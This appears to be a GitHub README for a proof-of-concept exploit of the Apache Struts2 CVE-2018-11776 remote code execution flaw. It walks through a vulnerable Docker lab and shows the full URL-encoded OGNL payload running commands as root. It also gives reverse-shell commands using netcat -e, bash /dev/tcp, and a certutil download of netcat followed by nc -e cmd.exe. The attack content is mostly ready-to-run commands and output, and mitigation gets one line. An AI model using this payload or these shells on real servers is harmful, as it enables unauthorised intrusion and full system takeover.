CVE-2018-11776-Python-PoC
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Working Python test and PoC for CVE-2018-11776, originally appearing on; https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
What's going on?
Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
Default configuration is not vulnerable, but if misconfigured... F.
Set up your docker instance
exploit will work fine with the docker container build for cve-2017-5638 (struts2-showcase-2.3.12)
$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
Set up your weakened configuration
$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
add the configuration below;
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
and also;
<struts>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
restart your tomcat and/or container
$ /usr/local/tomcat/bin/shutdown.sh
Verify that target is vulnerable
test the url to see if a redirect and evaluation occurs;
http://0.0.0.0:32771/${2+2}/help.action > http://0.0.0.0:32771/4/date.action
with the test script;
$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action
testing the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action
URL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!
Execute commands PoC
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'
[Execute]: id
[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
uid=0(root) gid=0(root) groups=0(root)
Reverse shell
get your box ready to accept the reverse shell;
$ netcat -lvp 31337
run the script;
# you'll want to install netcat
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'
# now pop that shell
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e "$SHELL" 172.17.0.1 31337'
replace 32771 with your exposed container port
Updated method via Bash, forward-slashes now supported.
$ netcat -lvp 31337
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 "/bin/bash -i >& /dev/tcp/172.17.0.1/31337 0>&1"
Windows reverse shell (untested)
# grab netcat binary
# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'
# execute
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 –e cmd.exe'
Debug hell (notes)
All requests with a forward-slash (/) will fail because Tomcat actively blocks these, you may need to work around this, for example using environment variables for /bin/bash as $SHELL in the example above.
- https://stackoverflow.com/questions/9719224/coding-forward-and-backward-slashes-in-tomcat-7
- http://engineering.widen.com/blog/tomcat-slashes/
With this in mind, the windows /c flag will not work as expected. I've only tested this on the docker container.
Update
Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved, the code now supports forward-slashes and so a reverse shell without netcat via bash is now also possible, also now supports Windows instances (untested).
Mitigation
Patch your Struts, or simply don't use it.
I guess you can always sell identify fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)
Credit
Thanks to ;
- Man Yue Mo, Semmle for disclosing the vulnerability (https://semmle.com/news/apache-struts-CVE-2018-11776)
- piesecurity for the Dockerfile lab and example of OGNL payload (https://github.com/piesecurity/apache-struts2-CVE-2017-5638)
- xfox64x for the write-up on the method (https://github.com/xfox64x/CVE-2018-11776)
- jiguang7 for the test (https://github.com/jiguang7/CVE-2018-11776)
- @Menin_TheMiddle for the writeup (https://www.secjuice.com/apache-struts2-cve-2018-11776/) and putting me in my place :) code now finally supports windows and bash reverse shell
Greetz
shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent